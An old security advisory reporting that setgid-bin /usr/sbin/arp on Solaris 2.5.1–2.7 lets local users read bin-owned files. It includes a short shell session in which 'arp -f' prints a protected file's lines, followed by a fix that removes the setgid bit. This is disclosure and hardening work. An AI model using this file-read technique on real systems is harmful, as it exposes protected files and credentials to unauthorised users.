COMMAND

    /usr/sbin/arp

SYSTEMS AFFECTED

    Solaris 2.x

PROBLEM

    Brock Tellier found following.  /usr/sbin/arp can be used to  read
    bin-owned files.   All testing  was done  on Solaris  2.7 and  2.6
    SPARC edition.

        bash-2.02$ ls -la /etc/bin
        -rw-rw----   1 bin      bin           45 Nov 15 16:44 /etc/bin
        bash-2.02$ cat /etc/bin
        cat: cannot open /etc/bin
        bash-2.02$ /usr/sbin/arp -f /etc/bin
        arp: bad line: seekret1

        arp: bad line: seekret2

        arp: bad line: seekret3

        arp: bad line: seekret4

        arp: bad line: seekret5

        bash-2.02$

    Larry W. Cashdollar confirmed it on 2.5.1.

SOLUTION

    You can safely  remove the set-gid  bin from arp.   No need to  be
    suid in any case.